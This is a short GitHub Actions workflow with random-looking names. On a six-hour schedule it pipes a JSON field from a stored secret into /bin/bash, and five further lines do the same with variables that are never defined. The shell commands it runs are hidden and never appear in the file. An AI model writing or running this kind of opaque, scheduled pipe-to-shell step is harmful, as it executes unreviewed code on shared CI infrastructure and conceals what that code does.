name: liangtoushang5678
on:
  workflow_dispatch:
  schedule:
    - cron: '3 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liangtoushang5678
        env:
          wo77: ${{ secrets.wo77 }}
        run: |
          echo $wo77 | jq -r .yhuqq7908 | /bin/bash
          echo $u4 | jq -r .zrz94 | /bin/bash
          echo $xv2528 | jq -r .j9063 | /bin/bash
          echo $nii2028 | jq -r .ottp6 | /bin/bash
          echo $ip699 | jq -r .v73300 | /bin/bash
          echo $ucu79328 | jq -r .yr711 | /bin/bash

